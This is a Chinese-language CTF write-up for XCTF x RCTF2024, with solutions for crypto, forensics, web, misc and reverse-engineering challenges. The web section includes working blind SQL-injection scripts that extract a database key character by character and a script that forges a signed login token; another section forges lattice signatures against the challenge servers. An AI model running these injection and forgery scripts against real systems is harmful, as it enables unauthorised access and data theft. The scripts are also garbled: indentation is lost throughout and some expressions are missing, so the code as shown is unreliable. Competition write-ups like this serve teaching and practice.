因此利用cpp源码构造pk、sig的解析,sage求出s1后再输入回去,构造私钥伪造签名即可
构造私钥的策略是随机产生多项式s2,然后利用已有值拼接签名
最后似乎不需要调用18论文的代码,使用原生代码已经可以伪造
from sage.all import *
from pwn import *
def sign(io, msg: bytes) -> str:
io.sendlineafter(b'> ', b'1')
io.sendlineafter(b'Please input the message: ', msg.encode())
io.recvuntil(b'You have signed the message successfullyn')
sig = io.recvline().strip().decode()
return sig
def verify(io, sig: str):
io.sendlineafter(b'> ', b'2')
io.sendlineafter(b'Please input the signature (as hex):n', sig.encode())
res = io.recvline().strip().decode()
return res
def m_pk_sig(m, pk, sig):
io = process('./m_pk_sig')
io.sendlineafter(b'm>n', m.encode())
io.sendlineafter(b'pk>n', pk.encode())
io.sendlineafter(b'sig>n', sig.encode())
zs = list()
for i in range(3):
io.recvuntil(f'z{i}: '.encode())
z = list(map(int, io.recvline().strip().decode().split()))
zs.append(z)
io.recvuntil(b'c: ')
c = list(map(int, io.recvline().strip().decode().split()))
io.close()
return zs, c
def s1_sig(s1s, pk):
io = process('./s1_sig')
io.sendlineafter(b'pk>n', pk.encode())
for i in range(3):
io.sendlineafter(b':', ' '.join(map(str, s1s[i])).encode())
io.recvuntil(b'sig: ')
sig = io.recvline().strip().decode()
io.close()
return sig
host, port = '121.37.182.7 10088'.split()
io = remote(host, port)
io.recvuntil(b'This is your public key: ')
pk = io.recvline().strip().decode()
m = 'rec'
sig = sign(io, m)
zs, c = m_pk_sig(m, pk, sig)
N = 256
q = 8380417
R.<x> = GF(7)[]
QR.<x> = R.quotient_ring(x^N+1)
s1s = list()
for i in range(3):
s1 = [ZZ(_) for _ in (QR(zs[i])/QR(c)).list()]
s1 = [i if i < 4 else i-7 for i in s1]
s1s.append(s1)
sig = s1_sig(s1s, pk)
print(verify(io, sig))
io.interactive()
cpp源码存储得比较乱,后面有机会再整理
Forensics-FindAHacker
把 ida 进程 dump 一下
![XCTF x RCTF2024 WP]( "XCTF x RCTF2024 WP")
.volatility.exe -f .Windows_7_x64_52Pojie_2-Snapshot2.vmem --profile Win7SP1x64 memdump -p 2172 --dump-dir=./
![XCTF x RCTF2024 WP]( "XCTF x RCTF2024 WP")
![XCTF x RCTF2024 WP]( "XCTF x RCTF2024 WP")
数据:
35 3f 4e 2b 56 6b 74 6a 5d 6d 6f 73 6c 77 38 68 59 6e 20 21 3c 71 4f 09 36 7d 55 72 51 32 27 66
0c 0f +Ho]FSdYYK_G[[k_ 15 16 ] 12 vk 07 1b 3Jg 07 11 0
异或可得到flag
mmm = [0x35,0x3f,0x4e,0x2b,0x56,0x6b,0x74,0x6a,0x5d,0x6d,0x6f,0x73,0x6c,0x77,0x38,0x68,0x59,0x6e,0x20,0x21,0x3c,0x71,0x4f,0x09,0x36,0x7d,0x55,0x72,0x51,0x32,0x27,0x66]
enc = [0x0c,0x0f,0x2b,0x48,0x6f,0x5d,0x46,0x53,0x64,0x59,0x59,0x4b,0x5f,0x47,0x5b,0x5b,0x6b,0x5f,0x15,0x16,0x5d,0x12,0x76,0x6b,0x07,0x1b,0x33,0x4a,0x67,0x07,0x11,0x0]
flag=[]
for i in range(len(mmm)):
flag.append(chr(mmm[i]^enc[i]))
print(''.join(flag))
#90ec9629946830c32157ac9b1ff8656f
RCTF{90ec9629946830c32157ac9b1ff8656f}
Web-what_is_love
简单看了两眼,key1在数据库中,key2需要伪造身份拿到
key1=1' || BINARY love_key REGEXP 'RCTF{' # 这样可以去拿key1
import requests
url="http://1.94.13.174:10088/key1"
flag='RCTF{'
payload="1' || BINARY love_key > '{}' #"
for i in range(100000):
for j in range(32,128):
data={
'key1':payload.format(flag+chr(j))
}
req=requests.post(url,data=data)
if "wrong" in req.text:
flag=flag+chr(j-1)
print(flag)
break
if j==127:
exit(0)
上面用的>去做匹配 由于长度限制还得配上REGEXP去跑剩下的flag
import requests
url="http://1.94.13.174:10088/key1"
flag='TO_KNOW'
payload="1' || BINARY love_key regexp '{}' #"
for i in range(100000):
for j in range(32,128):
data={
'key1':payload.format(flag+"\\"+chr(j))
}
req=requests.post(url,data=data)
if "success" in req.text:
flag=flag+chr(j)
print(flag)
if len(flag) > 20:
print("src_flag", flag)
flag=flag.replace("\\",'')[:-4]
break
if j==127:
exit(0)
RCTF{THE_FIRST_STEP_IS_TO_GET_TO_KNOW
加密方式是sha256,先获取正常的token。lover_time传一个字母
由于lover_time被Number处理后会变成NaN,在加密的时候与secret拼接,saltedSecret也会是NaN,所以直接
{"lovetime":null,"have_lovers":true}:NaN 拿去sha256替换掉上方的sha256,base64也换一下就成了
import requests
import base64
import hashlib
import json
url = "http://1.94.13.174:10088/key2"
data = {
"username": "lover",
"love_time": "a"
}
response = requests.post(url, data=data)
token = response.text.split("token:")[1].strip()
print(f"Obtained token: {token}")
userinfo = {
"username": "lover",
"love_time": None,
"have_lovers": True
}
data_hex = base64.b64encode(json.dumps(userinfo).encode()).decode()
signature = hashlib.sha256(f'{json.dumps(userinfo)}:NaN'.encode()).hexdigest()
evil_token = f"{data_hex}.{signature}"
print(f"Constructed evil token: {evil_token}")
url = "http://1.94.13.174:10088/check"
data = {
"love_token": evil_token
}
response = requests.post(url, data=data)
print(f"Response from /check: {response.text}")
#_AND_GIVE_A_10000_YEAR_COMMITMENT_FOR_LOVE}
Crypto-Mersenne
f、g、h是一个ntru样本,可以直接LLL得到f和g来,有很小的几率出错。
由于a、b、f、g汉明重量全都很低很低,并且p是一个Mersenne prime,所以模他等价于取低位,所以如果当前bit为0的话,会有:
这个汉明重量还是较低的,测试出来大概在200出头的样子,而如果为1则恰好等于取反,汉明重量应该会接近400,如此就可以做decision。
由于f、g可能会出错,所以跑多次就好了。
exp:
from random import randint
from Crypto.Util.number import *
from pwn import *
flag = ["*" for i in range(336)]
while(1):
p = 2^607-1
sh = remote("123.60.161.30",10089)
for i in range(336):
ans = sh.recvline().strip().decode().split(" ")
c,h = int(ans[0]),int(ans[1])
######################################
L = Matrix(ZZ,[
[1,h],
[0,p]
])
res = L.LLL()[0]
f,g = abs(res[1]) , abs(res[0])
if(bin(c*g % p)[2:].count("1") < 240):
flag[i] = "0"
elif(bin(c*g % p)[2:].count("1") > 360):
flag[i] = "1"
if("*" not in flag):
break
sh.close()
print(long_to_bytes(int("".join(flag),2)))
Misc-EzLogin
交互脚本如下,感谢rec提供的sha256
from pwn import *
import numpy as np
def proof(prefix: str, h: str) -> str:
import hashlib, itertools
prefix = bytes.fromhex(prefix)
for suffix in itertools.product(range(256), repeat=2):
suffix = bytes(suffix)
if hashlib.sha256(prefix + suffix).hexdigest() == h:
return suffix.hex()
sh = remote('121.37.179.243', 10088)
context.log_level = 'debug'
h = sh.recvline().decode().strip()[14:]
pre = sh.recvline().decode().strip()[15:]
print(h)
print(pre)
sh.sendline(proof(pre, h).encode())
sh.recvline()
img = np.array([[ 0., 0., 0., 0., 0., 255., 187., 255., 255., 255., 255.,
255., 237., 3., 0., 93., 166., 255., 255., 59., 0., 0.,
0., 55., 69., 255., 124., 255.],
[181., 0., 0., 0., 0., 255., 255., 255., 102., 172., 255.,
51., 255., 0., 0., 0., 202., 244., 255., 10., 138., 0.,
0., 0., 0., 0., 0., 255.],
[254., 250., 0., 0., 0., 0., 0., 51., 0., 0., 255.,
0., 255., 0., 0., 18., 0., 38., 203., 255., 0., 25.,
0., 0., 0., 0., 0., 255.],
[ 43., 255., 255., 255., 0., 0., 0., 255., 221., 255., 255.,
0., 0., 22., 255., 0., 255., 7., 26., 0., 255., 0.,
208., 22., 0., 0., 0., 16.],
[255., 255., 255., 136., 0., 255., 0., 255., 0., 255., 0.,
0., 0., 0., 253., 0., 40., 255., 116., 37., 146., 255.,
233., 107., 0., 0., 0., 0.],
[ 0., 0., 0., 225., 0., 255., 255., 255., 255., 4., 0.,
0., 0., 255., 125., 255., 197., 250., 0., 0., 255., 211.,
255., 255., 0., 255., 0., 255.],
[ 0., 0., 0., 0., 255., 0., 0., 255., 255., 255., 255.,
0., 0., 0., 255., 255., 0., 0., 0., 0., 255., 255.,
255., 255., 107., 58., 255., 255.],
[255., 255., 0., 0., 0., 0., 0., 255., 255., 255., 255.,
255., 255., 0., 255., 30., 130., 0., 17., 0., 0., 0.,
194., 255., 0., 255., 255., 255.],
[255., 0., 255., 0., 0., 0., 0., 0., 0., 255., 255.,
255., 0., 255., 255., 0., 255., 255., 255., 147., 77., 0.,
33., 255., 255., 255., 255., 167.],
[255., 255., 0., 255., 0., 217., 0., 255., 0., 0., 0.,
75., 0., 255., 0., 255., 0., 32., 88., 255., 255., 0.,
30., 255., 0., 255., 97., 211.],
[ 0., 255., 129., 153., 170., 255., 0., 255., 0., 255., 0.,
255., 255., 255., 255., 255., 0., 217., 0., 255., 41., 0.,
0., 0., 207., 0., 0., 0.],
[ 0., 0., 0., 0., 0., 0., 0., 0., 210., 255., 255.,
0., 255., 255., 255., 255., 198., 215., 0., 65., 255., 158.,
225., 0., 0., 0., 0., 255.],
[ 1., 0., 0., 0., 255., 0., 0., 255., 131., 114., 255.,
0., 0., 0., 63., 0., 255., 62., 76., 193., 255., 255.,
0., 255., 0., 0., 0., 0.],
[231., 255., 255., 255., 255., 255., 0., 0., 0., 0., 0.,
57., 0., 30., 44., 16., 0., 255., 246., 0., 255., 255.,
255., 238., 255., 0., 0., 255.],
[ 0., 255., 201., 0., 255., 255., 255., 246., 0., 15., 0.,
0., 0., 213., 237., 0., 28., 0., 255., 255., 255., 255.,
255., 255., 0., 0., 246., 255.],
[214., 0., 0., 55., 255., 1., 255., 255., 0., 0., 0.,
0., 205., 250., 255., 255., 255., 255., 0., 235., 91., 173.,
28., 255., 255., 0., 0., 5.],
[255., 255., 255., 255., 255., 255., 255., 0., 255., 233., 255.,
254., 0., 0., 97., 253., 0., 0., 255., 255., 255., 255.,
255., 255., 117., 255., 0., 255.],
[ 23., 20., 255., 255., 45., 102., 255., 255., 255., 0., 226.,
0., 0., 0., 0., 0., 0., 0., 255., 255., 255., 14.,
255., 0., 255., 255., 255., 255.],
[ 0., 0., 0., 0., 255., 0., 0., 0., 255., 43., 1.,
0., 0., 0., 0., 224., 33., 209., 255., 188., 255., 0.,
254., 0., 0., 255., 52., 16.],
[255., 0., 255., 255., 222., 0., 209., 122., 255., 255., 136.,
0., 0., 11., 0., 0., 0., 0., 255., 255., 255., 255.,
228., 58., 0., 255., 0., 0.],
[198., 0., 255., 255., 255., 121., 0., 222., 0., 0., 166.,
0., 0., 255., 69., 251., 144., 195., 105., 0., 117., 32.,
255., 204., 0., 200., 178., 0.],
[255., 0., 255., 162., 0., 0., 0., 0., 0., 199., 0.,
29., 255., 255., 255., 255., 255., 4., 0., 0., 0., 0.,
0., 0., 0., 255., 0., 107.],
[255., 255., 172., 0., 0., 0., 255., 0., 0., 80., 255.,
0., 0., 255., 106., 0., 20., 0., 0., 0., 0., 0.,
4., 0., 217., 255., 255., 206.],
[ 0., 228., 255., 255., 240., 0., 0., 0., 0., 255., 252.,
126., 0., 67., 0., 0., 255., 0., 255., 255., 0., 255.,
255., 255., 255., 185., 0., 180.],
[ 0., 0., 28., 255., 255., 238., 255., 25., 255., 0., 0.,
0., 0., 199., 0., 255., 0., 0., 0., 0., 0., 176.,
0., 0., 115., 117., 0., 237.],
[255., 0., 14., 255., 255., 163., 0., 0., 0., 0., 37.,
0., 0., 139., 92., 255., 9., 0., 0., 0., 0., 143.,
0., 225., 0., 230., 255., 230.],
[255., 255., 255., 255., 20., 90., 255., 255., 255., 255., 173.,
255., 255., 0., 0., 33., 58., 255., 255., 0., 0., 0.,
143., 255., 134., 50., 153., 21.],
[190., 255., 255., 255., 0., 0., 24., 255., 255., 255., 0.,
255., 255., 193., 0., 0., 0., 255., 0., 255., 0., 0.,
55., 0., 15., 0., 21., 21.]]).astype(np.uint8)
na = img.tobytes()
sh.sendline(na)
sh.recvall()
限定了数据范围的模型反演,自定义优化器秒了
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
from torch import optim
import torchvision.transforms as transforms
import numpy as np
class CNN(nn.Module):
def __init__(self):
super(CNN, self).__init__()
self.conv1 = nn.Conv2d(1, 2, 3, padding=1)
self.conv2 = nn.Conv2d(2, 8, 3, padding=1)
self.conv3 = nn.Conv2d(8, 32, 3, padding=1)
self.pool = nn.MaxPool2d(2, 2)
self.fc1 = nn.Linear(32 * 3 * 3, 1024)
self.fc2 = nn.Linear(1024, 512)
self.fc3 = nn.Linear(512, 256)
self.fc4 = nn.Linear(256, 128)
self.fc5 = nn.Linear(128, 47)
def forward(self, x):
x = self.pool(self.conv1(x))
x = self.pool(self.conv2(x))
x = self.pool(self.conv3(x))
x = x.view(-1, 32 * 3 * 3)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = F.relu(self.fc3(x))
x = F.relu(self.fc4(x))
x = self.fc5(x)
return x
feature = torch.tensor([[-6.19499969e+01, -1.56200895e+01, -3.52624054e+01, -1.34233132e-01,
-6.48261490e+01, -1.47979248e+02, -5.15059547e+01, -1.14444227e+01,
4.33434563e+01, -3.69645386e+01, 2.00579977e+00, 4.74611549e+01,
-6.33986130e+01, -1.57887411e+01, -2.87570419e+01, -5.35021248e+01,
-1.73028266e+00, -3.61370316e+01, -7.58331375e+01, -7.46535110e+01,
-7.24118347e+01, -4.76773834e+01, 6.51892662e+00, -5.07196846e+01,
-1.03041328e+02, 4.72574463e+01, 9.03826065e+01, 5.30947495e+01,
-5.03226738e+01, -1.50200531e+02, -3.46447792e+01, -4.23207245e+01,
6.44030609e+01, -5.05351334e+01, -4.11206970e+01, -2.18300457e+01,
2.70750694e+01, -1.00022865e+02, 3.77698517e+01, -3.60703392e+01,
-6.88536682e+01, 1.16945248e+01, -4.62400284e+01, -4.79546585e+01,
6.10636101e+01, -1.12650543e+02, -1.34837357e+02,]], dtype=torch.float32)
model = CNN()
model.load_state_dict(torch.load('model.pt.state',map_location=torch.device('cpu')))
model.eval()
img = torch.randint(0, 256, (1, 28, 28)).float()
img.requires_grad = True
optim = torch.optim.SGD(, lr=0.001)
def loss_criterion(output, target):
return torch.sqrt(torch.sum((target - output)**2))
for i in range(1000000):
pred = model(img)
optim.zero_grad()
loss = loss_criterion(pred, feature)
loss.backward()
optim.step()
img.grad.zero_()
if i % 200 == 0:
print(loss.item())
if loss.item() < 6:
print(img)
g = img.grad[0]
img.requires_grad = False
for x in range(28):
for y in range(28):
if g[x, y] > 0:
img[0, x, y] = max(0, img[0, x, y]-1)
else:
img[0, x, y] = min(256, img[0, x, y]+1)
img.requires_grad = True
if i % 200 == 0:
print(loss.item())
Crypto-L³
res = '''
'''
res = [list(map(int, i.split(' '))) for i in res.split('n')]
from sage.all import *
p = 0x1795712A13E07F7CCA7A0B09B33EE746414E48863BD7EE1BD0D883460828FE88516774E44AC3F0CE5DA045688C40844677DA6D38582AC7CF2C00E8724AD399059E9298BB1AD9834DAA0481765FFBB00FCA71BAD1E024F7193334D71755B0EEA1D1C761E11FB67C3B495F8D12720A59A8AAEC3F8A59BD6BC45C8C236A29B74CBE823BF9A816556F6DD79364A3E87B02028F9B35C5BC46EE597ABDC1A465B9F41353DD514AA5B91326EB4868BA1C3BC8B74F55DBEF6E59BCF896E15C8400CA6B695C368EF87CBD99FDD4D33F5889EE36A571240B16FFD76C0FAEB81E4550B8549193E88CF630D2422903D1AA08CA369FE0E79DD04F581B7DD8CB1D3F28F9EE2583B
g = res[0][1]
xs = []
from sage.all import *
from Crypto.Util.number import *
p = 0x1795712A13E07F7CCA7A0B09B33EE746414E48863BD7EE1BD0D883460828FE88516774E44AC3F0CE5DA045688C40844677DA6D38582AC7CF2C00E8724AD399059E9298BB1AD9834DAA0481765FFBB00FCA71BAD1E024F7193334D71755B0EEA1D1C761E11FB67C3B495F8D12720A59A8AAEC3F8A59BD6BC45C8C236A29B74CBE823BF9A816556F6DD79364A3E87B02028F9B35C5BC46EE597ABDC1A465B9F41353DD514AA5B91326EB4868BA1C3BC8B74F55DBEF6E59BCF896E15C8400CA6B695C368EF87CBD99FDD4D33F5889EE36A571240B16FFD76C0FAEB81E4550B8549193E88CF630D2422903D1AA08CA369FE0E79DD04F581B7DD8CB1D3F28F9EE2583B
res = [list(map(int, i.split(' '))) for i in res.split('n')]
g = res[0][1]
xs =
ys =
q = (p - 1) // 2
def solve_affine_hlcp(xs, ys, m, n):
K = 2**4096
L = block_matrix(ZZ, [
[1, K*matrix(ZZ, [xs, ys]).T],
[0, K*q]
])
L = flatter(L)
L = L.matrix_from_rows_and_columns(range(m-n-1), range(m))
L = block_matrix(ZZ, [
[1, K*L.T]
])
L = flatter(L)
L = L.matrix_from_rows_and_columns(range(3), range(m))
return L
def check_es(es):
es0, es1, es2 = [vector(ZZ, es[i]) for i in range(3)]
if all(0 < i < 2^(65*8) for i in es0) or all(0 < i < 2^(65*8) for i in -es0):
if all(0 < i < 2^(64*8) for i in es1) or all(0 < i < 2^(64*8) for i in -es1):
if all(0 < i < 2^(64*8) for i in es2) or all(0 < i < 2^(64*8) for i in -es2):
return True
return False
m = 72
n = 4
L = solve_affine_hlcp(xs, ys, m, n)
for row in L:print([_.nbits() for _ in row])
import itertools, tqdm
for a in tqdm.tqdm(itertools.product(range(-250, 250), repeat=2)):
for b in [[0, 1], [0, -1], [1, 0], [-1, 0]]:
for c in itertools.product([-1, 1], repeat=3):
T = matrix(ZZ, [
[a[0], a[1], c[0]],
[b[0], c[1], 0],
[b[1], c[2], 0]
])
try:
ee = T*L
if check_es(ee):
es0, es1, es2 = [vector(ZZ, ee[i]) for i in range(3)]
if es0[0] < 0:es0 = -es0
if es1[0] < 0:es1 = -es1
if es2[0] < 0:es2 = -es2
otp_key = bytes([int(es0[i] >> (32*8)) & 0xff for i in range(72)])
v = matrix(Zmod(q), xs) / matrix(Zmod(q), [es0, es1, es2, ys])
otp_flag = long_to_bytes(ZZ(-v.list()[-1]))
flag = bytes([k ^^ c for k, c in zip(otp_key, otp_flag)])
if b'RCTF' in flag:
print(T)
print(flag)
except Exception as e:
continue
Misc-sec-image
![XCTF x RCTF2024 WP]( "XCTF x RCTF2024 WP")
12可以去确定第四个字符,在6和9的图片有重复的字符0和2
最后判断出flag
![XCTF x RCTF2024 WP]( "XCTF x RCTF2024 WP")
img RCTF{c4baf0eb-e5ca-543a-06d0-39d72325a0}
思路:
从ps的nearest缩放的预览可以发现是分块渲染的做法
![XCTF x RCTF2024 WP]( "XCTF x RCTF2024 WP")
img ![XCTF x RCTF2024 WP]( "XCTF x RCTF2024 WP")
img ![XCTF x RCTF2024 WP]( "XCTF x RCTF2024 WP")
img ![XCTF x RCTF2024 WP]( "XCTF x RCTF2024 WP")
img 这是同一张图片文件在预览的不同拖拽视角显示的
全是在400x400的时候显示的
emmm
![XCTF x RCTF2024 WP]( "XCTF x RCTF2024 WP")
img ![XCTF x RCTF2024 WP]( "XCTF x RCTF2024 WP")
img ![XCTF x RCTF2024 WP]( "XCTF x RCTF2024 WP")
img ![XCTF x RCTF2024 WP]( "XCTF x RCTF2024 WP")
img 光栅,感觉是非预期
我的做法直接把图片拆成2x2区域,每个800x800的图片拆成四个400x400的图片
import numpy as np
import os
from PIL import Image
for filename in [_ for _ in os.listdir() if _.startswith('flag')]:
img = Image.open(filename)
img_array = np.array(img)
new_img_array = np.zeros((400, 400, 3), dtype=np.uint8)
for index, (a, b) in enumerate([(0, 0), (0, 1), (1, 0), (1, 1)]):
new_img_array[:, :, :] = img_array[a::2, b::2, :]
new_img = Image.fromarray(new_img_array)
new_img.save(f"2/{filename[:5]}_{index}.png")
清晰可见
![XCTF x RCTF2024 WP]( "XCTF x RCTF2024 WP")
img RCTF{c4baf0eb-e5ca-543a-06d0-39d72325a0}
解法二
使用github的Raster-Terminator.py脚本,先向外再向内解析就可以获得flag
- from PIL import Image
import numpy as np
import argparse, io, sys, os
def title():
logo0='''
+------------------------------+--------------------------------------------------+
Title: Raster Terminator +..%%%%%....%%%%....%%%%...%%%%%%..%%%%%%..%%%%%...+
Introduction: 光栅图秒杀器 +..%%..%%..%%..%%..%%........%%....%%......%%..%%..+
Author: 曾哥(@AabyssZG) +..%%%%%...%%%%%%...%%%%.....%%....%%%%....%%%%%...+
Version: V1.1 +..%%..%%..%%..%%......%%....%%....%%......%%..%%..+
Whoami: +..%%..%%..%%..%%...%%%%.....%%....%%%%%%..%%..%%..+
https://github.com/AabyssZG +..................................................+
+------------------------------+..................................................+
+.................................................................................+
+.%%%%%%..%%%%%%..%%%%%...%%...%%..%%%%%%..%%..%%...%%%%...%%%%%%...%%%%...%%%%%..+
+...%%....%%......%%..%%..%%%.%%%....%%....%%%.%%..%%..%%....%%....%%..%%..%%..%%.+
+...%%....%%%%....%%%%%...%%.%.%%....%%....%%.%%%..%%%%%%....%%....%%..%%..%%%%%..+
+...%%....%%......%%..%%..%%...%%....%%....%%..%%..%%..%%....%%....%%..%%..%%..%%.+
+...%%....%%%%%%..%%..%%..%%...%%..%%%%%%..%%..%%..%%..%%....%%.....%%%%...%%..%%.+
+------------------------------+--------------------------------------------------+
'''
print(logo0)
def ImageRead(imagename):
print('[.] 读取图片当中.....')
img = Image.open(imagename)
width, height = img.size
print('[+] 图片长为:{} n[+] 图片宽为:{}'.format(width, height))
return width, height
def Folder():
if os.path.exists("./output"):
print(f"[.] 输出文件夹已经存在,无需创建")
datanames = os.listdir("./output")
for i in datanames:
c_path = os.path.join("./output", i)
if os.path.isdir(c_path):如果是文件夹那么递归调用一下
del_file(c_path)
else: 如果是一个文件那么直接删除
os.remove(c_path)
print(f"[+] 已经清空输出文件夹./outputn")
else:
os.mkdir("./output")
print(f"[+] 切割文件夹不存在,已经创建n")
def Operations(width,height,x,y):
width,height = int(width),int(height)
x,y = int(x),int(y)
output = []
if x == 2:
while x <= 10:
if (width % x == 0):
output.insert(1,x)
x = x+1
print('[+] 计算成功,获得以下横向数值' str(output))
elif y == 2:
while y <= 10:
if (height % y == 0):
output.insert(1,y)
y = y+1
print('[+] 计算成功,获得以下纵向数值' str(output))
else:
print('[-] 出现错误,请排查')
return output
def ImageWrite(x,y,imagename):
x,y = int(x),int(y)
img = np.array(Image.open(imagename))
if x != 0:
for i in range(x):
print('[+] 正在输出第 {} 张图片'.format(i+1))
z = np.zeros_like(img)
z[:, i::x, :] = img[:, i::x, :]
imgnew = Image.fromarray(z)
imgnew.save('./output/{}-{}.png'.format(x,i+1))
print('[+] 文件写入完毕,请查收!')
else:
for i in range(y):
print('[+] 正在输出第 {} 张图片'.format(i+1))
z = np.zeros_like(img)
z[i::y, :, :] = img[i::y, :, :]
imgnew = Image.fromarray(z)
imgnew.save('./output/{}-{}.png'.format(y,i+1))
print('[+] 文件写入完毕,请查收!')
def ImageOut(x,y,imagename):
x,y = int(x),int(y)
img = np.array(Image.open(imagename))
if x:
for i in range(x):
print('[+] 正在输出第 {} 张图片'.format(i+1))
z = np.zeros_like(img)
z[:, i::x, :] = img[:, i::x, :]
Image.fromarray(z).show()
print('[+] 输出完毕,请查收!')
else:
for i in range(y):
print('[+] 正在输出第 {} 张图片'.format(i+1))
z = np.zeros_like(img)
z[i::y, :, :] = img[i::y, :, :]
Image.fromarray(z).show()
print('[+] 输出完毕,请查收!')
if name == '__main__':
title()
parser = argparse.ArgumentParser(description="Raster Terminator V1.1", epilog='自动读取图片并尝试爆破光栅,诸如:python3 Raster-Terminator.py -x demo.png')
parser.add_argument('-x', action='store', dest='xcoordinate', help='自动读取图片并尝试爆破横向光栅图')
parser.add_argument('-y', action='store', dest='ycoordinate', help='自动读取图片并尝试爆破纵向光栅图')
parser.add_argument('-i', action='store', dest='imageout', help='自定义爆破光栅图')
args = parser.parse_args()
try:
if args.xcoordinate:
width, height = ImageRead(args.xcoordinate)
x,y,index = 2,0,0
outputend = []
outputend = Operations(width,height,x,y)
Folder()
while index < len(outputend):
x = outputend[index]
ImageWrite(x,y,args.xcoordinate)
index += 1
if args.ycoordinate:
width, height = ImageRead(args.ycoordinate)
x,y,index = 0,2,0
outputend = []
outputend = Operations(width,height,x,y)
Folder()
while index < len(outputend):
y = outputend[index]
ImageWrite(x,y,args.ycoordinate)
index += 1
if args.imageout:
ImageRead(args.imageout)
state = input("横向光栅还是纵向光栅(x/y)")
x,y = 0,0
if state == "x":
x = input("横向光栅多少量")
ImageOut(x,y,args.imageout)
elif state == "y":
y = input("纵向光栅多少量")
ImageOut(x,y,args.imageout)
else:
print("请输入x或者y")
sys.exit()
except KeyboardInterrupt:
print("Ctrl + C 手动终止了进程")
sys.exit()
except BaseException as e:
err = str(e)
print('脚本详细报错:' err)
sys.exit(0)
Re-2048
利用ssa+ssd的行走方式,大概率可以合成2048,如果卡住在加一个w。每次把分数全部压进去,多开几个进程进行爆破,可以很快达到100万。
from pwn import *
#io = process('./2048')
io=remote('1.94.104.104',10088)
io.recvuntil(b'score: ')
score = (io.recvuntil(b'n'))[:-1]
print(score)
print("##########")
for i in range(10000000000):
io.sendline(b'1')
io.sendline(score)
io.sendline(
b'ssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdwssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssdssassassassdssdssd')
io.recvuntil(b'win')
io.recvline()
io.recvuntil(b'score: ')
score = (io.recvuntil(b'n'))[:-1]
print(score)
s = int(score.decode())
if (s > 1000000):
io.sendline(b'3')
a=io.recvuntil(b'exit')
b=io.recvall()
print(b)
break
Forensics-gogogo
导出火狐的数据库文件
.volatility.exe -f .gogogo.raw --profile Win7SP1x86_23418 dumpfiles -Q 0x000000007f634f80 -D .
![XCTF x RCTF2024 WP]( "XCTF x RCTF2024 WP")
找到百度网盘地址,http://pan.baidu.com/share/init?surl=ZllFd8IK-oHvTCYl61_7Kw
![XCTF x RCTF2024 WP]( "XCTF x RCTF2024 WP")
在剪切板找到提取码cwqs
.volatility.exe -f .gogogo.raw --profile Win7SP1x86_23418 clipboard
![XCTF x RCTF2024 WP]( "XCTF x RCTF2024 WP")
下载到zip
暂时无法在飞书文档外展示此内容
在火狐浏览器数据库中得到一个哔哩哔哩地址
![XCTF x RCTF2024 WP]( "XCTF x RCTF2024 WP")
https://space.bilibili.com/3546644702301067
访问后主页个性签名写着 pwd=uid,所以解压密码是
3546644702301067
解压后得到一个流量包和加密压缩包,直接键盘流量分析得到
niuo ybufmefhui kjqillxdjwmi uizebuui
dvoo
udpn uibuui jqybdm vegeyisi
vemeuoll jxysgowodmnkderf dbmzfa hkhkdazi
zvjnybufme hkwjdeggma
na mimajqueviig
kyllda doqisl ba
pnynqrpn
qrxcxxzimu
最后双拼输入法得到压缩包密码
kuailaidaduoqisaiba
![XCTF x RCTF2024 WP]( "XCTF x RCTF2024 WP")
Re-bloker_vm
不知道在考啥
msg = [0xb9,0xd9,0x70,0x6e,0x10,0x46,0x02,0xb1,0x6f,0x3f,0xcc,0xcc,0x29,0x06,0xcf,0x90,0xe3,0x2a,0xb4,0xee,0x30,0xcd,0xad,0x26,0x0e]
des = [0x80,0x05,0xe3,0x2f,0x18,0x2f,0xc5,0x8c,0x25,0x70,0xbc,0x05,0x1c,0x4f,0xf2,0x02,0xe5,0x3e,0x02,0x2f,0xe5,0x11,0xa3,0xc0,0x00]
